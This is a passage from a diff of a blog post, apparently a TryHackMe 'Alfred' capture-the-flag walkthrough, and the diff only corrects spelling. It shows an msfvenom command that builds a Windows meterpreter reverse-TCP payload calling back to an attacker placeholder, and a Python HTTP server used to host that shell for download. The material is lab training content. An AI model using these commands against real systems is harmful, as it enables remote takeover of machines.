Nesousx/masoopy-web/content/posts/2021-02-11-THM-Alfred.md

 However, one easy solution would be to get a meterpreter shell and use msfconsole...

 Before going any further, I will run another build doing a `dir "C:\"`.
 I just want to check the system architecture (be sure check my [cheatsheets](https://www.masoopy.com/cheatsheets/) if you are lost during a phase).
-It might prove usefull later on, if I want to craft something with `msfvenom`.
+It might prove useful later on, if I want to craft something with `msfvenom`.

 Since we know our arch is 64 bits, let's craft our shell :

 `msfvenom -p windows/meterpreter/reverse_tcp LHOST=$attacker_ip LPORT=10443 -f exe > shell.exe`

-Now we run a basic HTTP server from our attaking machine to host the shell :
+Now we run a basic HTTP server from our attacking machine to host the shell :

 `sudo python2 -m SimpleHTTPServer 80`